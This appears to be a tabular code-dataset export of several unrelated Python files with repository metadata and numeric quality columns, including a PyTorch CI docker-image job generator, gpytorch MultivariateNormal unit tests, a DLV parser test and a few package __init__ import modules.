491f989cd918cf08874dd4f671fb7f0142a0bc4f
|
[
"Intel",
"X11"
] | null | null | null |
from collections import OrderedDict
from cimodel.lib.miniutils import quote
# TODO: make this generated from a matrix rather than just a static list
IMAGE_NAMES = [
"pytorch-linux-bionic-cuda11.0-cudnn8-py3.6-gcc9",
"pytorch-linux-bionic-cuda11.0-cudnn8-py3.8-gcc9",
"pytorch-linux-bionic-cuda10.2-cudnn7-py3.8-gcc9",
"pytorch-linux-bionic-py3.6-clang9",
"pytorch-linux-bionic-cuda10.2-cudnn7-py3.6-clang9",
"pytorch-linux-bionic-py3.8-gcc9",
"pytorch-linux-xenial-cuda10-cudnn7-py3-gcc7",
"pytorch-linux-xenial-cuda10.1-cudnn7-py3-gcc7",
"pytorch-linux-xenial-cuda10.2-cudnn7-py3-gcc7",
"pytorch-linux-xenial-cuda11.0-cudnn8-py3-gcc7",
"pytorch-linux-xenial-cuda9.2-cudnn7-py3-gcc5.4",
"pytorch-linux-xenial-cuda9.2-cudnn7-py3-gcc7",
"pytorch-linux-xenial-py3-clang5-android-ndk-r19c",
"pytorch-linux-xenial-py3-clang5-asan",
"pytorch-linux-xenial-py3.8",
"pytorch-linux-xenial-py3.6-clang7",
"pytorch-linux-xenial-py3.6-gcc4.8",
"pytorch-linux-xenial-py3.6-gcc5.4",
"pytorch-linux-xenial-py3.6-gcc7.2",
"pytorch-linux-xenial-py3.6-gcc7",
"pytorch-linux-xenial-pynightly",
"pytorch-linux-xenial-rocm3.3-py3.6",
]
def get_workflow_jobs():
"""Generates a list of docker image build definitions"""
return [
OrderedDict(
{
"docker_build_job": OrderedDict(
{"name": quote(image_name), "image_name": quote(image_name)}
)
}
)
for image_name in IMAGE_NAMES
]
| 34.6
| 80
| 0.663455
| 217
| 1,557
| 4.714286
| 0.299539
| 0.258065
| 0.281525
| 0.164223
| 0.572825
| 0.479961
| 0.322581
| 0
| 0
| 0
| 0
| 0.076803
| 0.180475
| 1,557
| 44
| 81
| 35.386364
| 0.724922
| 0.078356
| 0
| 0
| 1
| 0
| 0.622113
| 0.60112
| 0
| 0
| 0
| 0.022727
| 0
| 1
| 0.027027
| false
| 0
| 0.054054
| 0
| 0.108108
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
435ca8be44a185d26d6f4c847581bd921b49022f
| 11,191
|
py
|
Python
|
test/distributions/test_multivariate_normal.py
|
konstantinklemmer/gpytorch
|
f1d947b340a188c398b6c6e610b6a839c61aa298
|
[
"MIT"
] | 2
|
2019-03-31T04:36:30.000Z
|
2019-05-22T20:09:25.000Z
|
test/distributions/test_multivariate_normal.py
|
konstantinklemmer/gpytorch
|
f1d947b340a188c398b6c6e610b6a839c61aa298
|
[
"MIT"
] | null | null | null |
test/distributions/test_multivariate_normal.py
|
konstantinklemmer/gpytorch
|
f1d947b340a188c398b6c6e610b6a839c61aa298
|
[
"MIT"
] | 1
|
2019-02-15T17:05:42.000Z
|
2019-02-15T17:05:42.000Z
|
from __future__ import absolute_import, division, print_function, unicode_literals
import unittest
import torch
from gpytorch.distributions import MultivariateNormal
from gpytorch.lazy import LazyTensor, NonLazyTensor
from test._utils import approx_equal
class TestMultivariateNormal(unittest.TestCase):
def test_multivariate_normal_non_lazy(self, cuda=False):
device = torch.device("cuda") if cuda else torch.device("cpu")
mean = torch.tensor([0, 1, 2], dtype=torch.float, device=device)
covmat = torch.diag(torch.tensor([1, 0.75, 1.5], device=device))
mvn = MultivariateNormal(mean=mean, covariance_matrix=covmat, validate_args=True)
self.assertTrue(torch.is_tensor(mvn.covariance_matrix))
self.assertIsInstance(mvn.lazy_covariance_matrix, LazyTensor)
self.assertTrue(approx_equal(mvn.variance, torch.diag(covmat)))
self.assertTrue(approx_equal(mvn.scale_tril, covmat.sqrt()))
mvn_plus1 = mvn + 1
self.assertTrue(torch.equal(mvn_plus1.mean, mvn.mean + 1))
self.assertTrue(torch.equal(mvn_plus1.covariance_matrix, mvn.covariance_matrix))
mvn_times2 = mvn * 2
self.assertTrue(torch.equal(mvn_times2.mean, mvn.mean * 2))
self.assertTrue(torch.equal(mvn_times2.covariance_matrix, mvn.covariance_matrix * 4))
mvn_divby2 = mvn / 2
self.assertTrue(torch.equal(mvn_divby2.mean, mvn.mean / 2))
self.assertTrue(torch.equal(mvn_divby2.covariance_matrix, mvn.covariance_matrix / 4))
self.assertAlmostEqual(mvn.entropy().item(), 4.3157, places=4)
self.assertAlmostEqual(mvn.log_prob(torch.zeros(3, device=device)).item(), -4.8157, places=4)
logprob = mvn.log_prob(torch.zeros(2, 3, device=device))
logprob_expected = torch.tensor([-4.8157, -4.8157], device=device)
self.assertTrue(approx_equal(logprob, logprob_expected))
conf_lower, conf_upper = mvn.confidence_region()
self.assertTrue(approx_equal(conf_lower, mvn.mean - 2 * mvn.stddev))
self.assertTrue(approx_equal(conf_upper, mvn.mean + 2 * mvn.stddev))
self.assertTrue(mvn.sample().shape == torch.Size([3]))
self.assertTrue(mvn.sample(torch.Size([2])).shape == torch.Size([2, 3]))
self.assertTrue(mvn.sample(torch.Size([2, 4])).shape == torch.Size([2, 4, 3]))
def test_multivariate_normal_non_lazy_cuda(self):
if torch.cuda.is_available():
self.test_multivariate_normal_non_lazy(cuda=True)
def test_multivariate_normal_batch_non_lazy(self, cuda=False):
device = torch.device("cuda") if cuda else torch.device("cpu")
mean = torch.tensor([0, 1, 2], dtype=torch.float, device=device)
covmat = torch.diag(torch.tensor([1, 0.75, 1.5], device=device))
mvn = MultivariateNormal(mean=mean.repeat(2, 1), covariance_matrix=covmat.repeat(2, 1, 1), validate_args=True)
self.assertTrue(torch.is_tensor(mvn.covariance_matrix))
self.assertIsInstance(mvn.lazy_covariance_matrix, LazyTensor)
self.assertTrue(approx_equal(mvn.variance, covmat.diag().repeat(2, 1)))
self.assertTrue(approx_equal(mvn.scale_tril, torch.diag(covmat.diag().sqrt()).repeat(2, 1, 1)))
mvn_plus1 = mvn + 1
self.assertTrue(torch.equal(mvn_plus1.mean, mvn.mean + 1))
self.assertTrue(torch.equal(mvn_plus1.covariance_matrix, mvn.covariance_matrix))
mvn_times2 = mvn * 2
self.assertTrue(torch.equal(mvn_times2.mean, mvn.mean * 2))
self.assertTrue(torch.equal(mvn_times2.covariance_matrix, mvn.covariance_matrix * 4))
mvn_divby2 = mvn / 2
self.assertTrue(torch.equal(mvn_divby2.mean, mvn.mean / 2))
self.assertTrue(torch.equal(mvn_divby2.covariance_matrix, mvn.covariance_matrix / 4))
self.assertTrue(approx_equal(mvn.entropy(), 4.3157 * torch.ones(2, device=device)))
logprob = mvn.log_prob(torch.zeros(2, 3, device=device))
logprob_expected = -4.8157 * torch.ones(2, device=device)
self.assertTrue(approx_equal(logprob, logprob_expected))
logprob = mvn.log_prob(torch.zeros(2, 2, 3, device=device))
logprob_expected = -4.8157 * torch.ones(2, 2, device=device)
self.assertTrue(approx_equal(logprob, logprob_expected))
conf_lower, conf_upper = mvn.confidence_region()
self.assertTrue(approx_equal(conf_lower, mvn.mean - 2 * mvn.stddev))
self.assertTrue(approx_equal(conf_upper, mvn.mean + 2 * mvn.stddev))
self.assertTrue(mvn.sample().shape == torch.Size([2, 3]))
self.assertTrue(mvn.sample(torch.Size([2])).shape == torch.Size([2, 2, 3]))
self.assertTrue(mvn.sample(torch.Size([2, 4])).shape == torch.Size([2, 4, 2, 3]))
def test_multivariate_normal_batch_non_lazy_cuda(self):
if torch.cuda.is_available():
self.test_multivariate_normal_batch_non_lazy(cuda=True)
def test_multivariate_normal_lazy(self, cuda=False):
device = torch.device("cuda") if cuda else torch.device("cpu")
mean = torch.tensor([0, 1, 2], dtype=torch.float, device=device)
covmat = torch.diag(torch.tensor([1, 0.75, 1.5], device=device))
mvn = MultivariateNormal(mean=mean, covariance_matrix=NonLazyTensor(covmat))
self.assertTrue(torch.is_tensor(mvn.covariance_matrix))
self.assertIsInstance(mvn.lazy_covariance_matrix, LazyTensor)
self.assertTrue(torch.equal(mvn.variance, torch.diag(covmat)))
self.assertTrue(torch.equal(mvn.covariance_matrix, covmat))
mvn_plus1 = mvn + 1
self.assertTrue(torch.equal(mvn_plus1.mean, mvn.mean + 1))
self.assertTrue(torch.equal(mvn_plus1.covariance_matrix, mvn.covariance_matrix))
mvn_times2 = mvn * 2
self.assertTrue(torch.equal(mvn_times2.mean, mvn.mean * 2))
self.assertTrue(torch.equal(mvn_times2.covariance_matrix, mvn.covariance_matrix * 4))
mvn_divby2 = mvn / 2
self.assertTrue(torch.equal(mvn_divby2.mean, mvn.mean / 2))
self.assertTrue(torch.equal(mvn_divby2.covariance_matrix, mvn.covariance_matrix / 4))
# TODO: Add tests for entropy, log_prob, etc. - this an issue b/c it
# uses using root_decomposition which is not very reliable
# self.assertAlmostEqual(mvn.entropy().item(), 4.3157, places=4)
# self.assertAlmostEqual(mvn.log_prob(torch.zeros(3)).item(), -4.8157, places=4)
# self.assertTrue(
# approx_equal(
# mvn.log_prob(torch.zeros(2, 3)), -4.8157 * torch.ones(2))
# )
# )
conf_lower, conf_upper = mvn.confidence_region()
self.assertTrue(approx_equal(conf_lower, mvn.mean - 2 * mvn.stddev))
self.assertTrue(approx_equal(conf_upper, mvn.mean + 2 * mvn.stddev))
self.assertTrue(mvn.sample().shape == torch.Size([3]))
self.assertTrue(mvn.sample(torch.Size([2])).shape == torch.Size([2, 3]))
self.assertTrue(mvn.sample(torch.Size([2, 4])).shape == torch.Size([2, 4, 3]))
def test_multivariate_normal_lazy_cuda(self):
if torch.cuda.is_available():
self.test_multivariate_normal_lazy(cuda=True)
def test_multivariate_normal_batch_lazy(self, cuda=False):
device = torch.device("cuda") if cuda else torch.device("cpu")
mean = torch.tensor([0, 1, 2], dtype=torch.float, device=device)
covmat = torch.diag(torch.tensor([1, 0.75, 1.5], device=device))
mvn = MultivariateNormal(mean=mean.repeat(2, 1), covariance_matrix=NonLazyTensor(covmat).repeat(2, 1, 1))
self.assertTrue(torch.is_tensor(mvn.covariance_matrix))
self.assertIsInstance(mvn.lazy_covariance_matrix, LazyTensor)
self.assertTrue(approx_equal(mvn.variance, covmat.diag().repeat(2, 1)))
mvn_plus1 = mvn + 1
self.assertTrue(torch.equal(mvn_plus1.mean, mvn.mean + 1))
self.assertTrue(torch.equal(mvn_plus1.covariance_matrix, mvn.covariance_matrix))
mvn_times2 = mvn * 2
self.assertTrue(torch.equal(mvn_times2.mean, mvn.mean * 2))
self.assertTrue(torch.equal(mvn_times2.covariance_matrix, mvn.covariance_matrix * 4))
mvn_divby2 = mvn / 2
self.assertTrue(torch.equal(mvn_divby2.mean, mvn.mean / 2))
self.assertTrue(torch.equal(mvn_divby2.covariance_matrix, mvn.covariance_matrix / 4))
# TODO: Add tests for entropy, log_prob, etc. - this an issue b/c it
# uses using root_decomposition which is not very reliable
# self.assertTrue(approx_equal(mvn.entropy(), 4.3157 * torch.ones(2)))
# self.assertTrue(
# approx_equal(mvn.log_prob(torch.zeros(2, 3)), -4.8157 * torch.ones(2))
# )
# self.assertTrue(
# approx_equal(mvn.log_prob(torch.zeros(2, 2, 3)), -4.8157 * torch.ones(2, 2))
# )
conf_lower, conf_upper = mvn.confidence_region()
self.assertTrue(approx_equal(conf_lower, mvn.mean - 2 * mvn.stddev))
self.assertTrue(approx_equal(conf_upper, mvn.mean + 2 * mvn.stddev))
self.assertTrue(mvn.sample().shape == torch.Size([2, 3]))
self.assertTrue(mvn.sample(torch.Size([2])).shape == torch.Size([2, 2, 3]))
self.assertTrue(mvn.sample(torch.Size([2, 4])).shape == torch.Size([2, 4, 2, 3]))
def test_multivariate_normal_batch_lazy_cuda(self):
if torch.cuda.is_available():
self.test_multivariate_normal_batch_lazy(cuda=True)
def test_multivariate_normal_correlated_sampels(self, cuda=False):
device = torch.device("cuda") if cuda else torch.device("cpu")
mean = torch.tensor([0, 1, 2], dtype=torch.float, device=device)
covmat = torch.diag(torch.tensor([1, 0.75, 1.5], device=device))
mvn = MultivariateNormal(mean=mean, covariance_matrix=NonLazyTensor(covmat))
base_samples = mvn.get_base_samples(torch.Size((3, 4)))
self.assertTrue(mvn.sample(base_samples=base_samples).shape == torch.Size([3, 4, 3]))
base_samples = mvn.get_base_samples()
self.assertTrue(mvn.sample(base_samples=base_samples).shape == torch.Size([3]))
def test_multivariate_normal_correlated_sampels_cuda(self):
if torch.cuda.is_available():
self.test_multivariate_normal_correlated_sampels(cuda=True)
def test_multivariate_normal_batch_correlated_sampels(self, cuda=False):
device = torch.device("cuda") if cuda else torch.device("cpu")
mean = torch.tensor([0, 1, 2], dtype=torch.float, device=device)
covmat = torch.diag(torch.tensor([1, 0.75, 1.5], device=device))
mvn = MultivariateNormal(mean=mean.repeat(2, 1), covariance_matrix=NonLazyTensor(covmat).repeat(2, 1, 1))
base_samples = mvn.get_base_samples(torch.Size((3, 4)))
self.assertTrue(mvn.sample(base_samples=base_samples).shape == torch.Size([3, 4, 2, 3]))
base_samples = mvn.get_base_samples()
self.assertTrue(mvn.sample(base_samples=base_samples).shape == torch.Size([2, 3]))
def test_multivariate_normal_batch_correlated_sampels_cuda(self):
if torch.cuda.is_available():
self.test_multivariate_normal_batch_correlated_sampels(cuda=True)
if __name__ == "__main__":
unittest.main()
| 58.286458
| 118
| 0.683764
| 1,526
| 11,191
| 4.837484
| 0.074705
| 0.127066
| 0.077215
| 0.08453
| 0.947575
| 0.93728
| 0.928068
| 0.899621
| 0.869277
| 0.869277
| 0
| 0.032951
| 0.181038
| 11,191
| 191
| 119
| 58.591623
| 0.772504
| 0.068001
| 0
| 0.703947
| 0
| 0
| 0.004803
| 0
| 0
| 0
| 0
| 0.005236
| 0.453947
| 1
| 0.078947
| false
| 0
| 0.039474
| 0
| 0.125
| 0.006579
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
438449ad4ee647fb59f0da92db683246e22a4891
| 141
|
py
|
Python
|
tests/parser/recursive_aggregates.2.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/recursive_aggregates.2.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/recursive_aggregates.2.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
input = """
d(1).
d(2).
d(3).
d(4) :- #min{V : d(V)} = 1.
"""
output = """
d(1).
d(2).
d(3).
d(4) :- #min{V : d(V)} = 1.
"""
| 8.294118
| 28
| 0.29078
| 28
| 141
| 1.464286
| 0.321429
| 0.097561
| 0.146341
| 0.195122
| 0.731707
| 0.731707
| 0.731707
| 0.731707
| 0.731707
| 0.731707
| 0
| 0.103093
| 0.312057
| 141
| 16
| 29
| 8.8125
| 0.319588
| 0
| 0
| 0.833333
| 0
| 0
| 0.75969
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
43b44a662a6f0c396e5b0b93df345e62dae7378a
| 282
|
py
|
Python
|
impl/inversion/__init__.py
|
cmrudolph/algorithms
|
3097d0082094ade4de654b342db09be22e2917ba
|
[
"MIT"
] | null | null | null |
impl/inversion/__init__.py
|
cmrudolph/algorithms
|
3097d0082094ade4de654b342db09be22e2917ba
|
[
"MIT"
] | null | null | null |
impl/inversion/__init__.py
|
cmrudolph/algorithms
|
3097d0082094ade4de654b342db09be22e2917ba
|
[
"MIT"
] | null | null | null |
from .inversion import (py_brute_force,
py_recursive_merge,
adapt_benchmark_args,
adapt_run_args)
__all__ = [
'py_brute_force',
'py_recursive_merge',
'adapt_benchmark_args',
'adapt_run_args'
]
| 23.5
| 45
| 0.560284
| 28
| 282
| 4.928571
| 0.464286
| 0.101449
| 0.173913
| 0.202899
| 0.84058
| 0.84058
| 0.84058
| 0.84058
| 0.84058
| 0.84058
| 0
| 0
| 0.368794
| 282
| 11
| 46
| 25.636364
| 0.775281
| 0
| 0
| 0
| 0
| 0
| 0.234043
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.1
| 0
| 0.1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
43d010b3ca481bea9b8bf65c8a090f69433dda3a
| 170
|
py
|
Python
|
loldib/getratings/models/NA/na_cassiopeia/__init__.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_cassiopeia/__init__.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_cassiopeia/__init__.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from .na_cassiopeia_top import *
from .na_cassiopeia_jng import *
from .na_cassiopeia_mid import *
from .na_cassiopeia_bot import *
from .na_cassiopeia_sup import *
| 28.333333
| 33
| 0.794118
| 25
| 170
| 5
| 0.36
| 0.24
| 0.64
| 0.704
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.147059
| 170
| 5
| 34
| 34
| 0.862069
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
60112a997239409730680e34f2be721cd2aaa7bf
| 111
|
py
|
Python
|
src/vpnchooser/helpers/fields/__init__.py
|
cbrand/vpnchooser
|
0982baeb14eff1e0b7ef5dbc8f11b3a7213f341c
|
[
"MIT"
] | null | null | null |
src/vpnchooser/helpers/fields/__init__.py
|
cbrand/vpnchooser
|
0982baeb14eff1e0b7ef5dbc8f11b3a7213f341c
|
[
"MIT"
] | null | null | null |
src/vpnchooser/helpers/fields/__init__.py
|
cbrand/vpnchooser
|
0982baeb14eff1e0b7ef5dbc8f11b3a7213f341c
|
[
"MIT"
] | 1
|
2016-05-31T16:14:37.000Z
|
2016-05-31T16:14:37.000Z
|
# -*- encoding: utf-8 -*-
from .absolute_url import AbsoluteUrl
from .absolute_url import NullableAbsoluteUrl
| 22.2
| 45
| 0.774775
| 13
| 111
| 6.461538
| 0.692308
| 0.285714
| 0.357143
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010309
| 0.126126
| 111
| 4
| 46
| 27.75
| 0.85567
| 0.207207
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.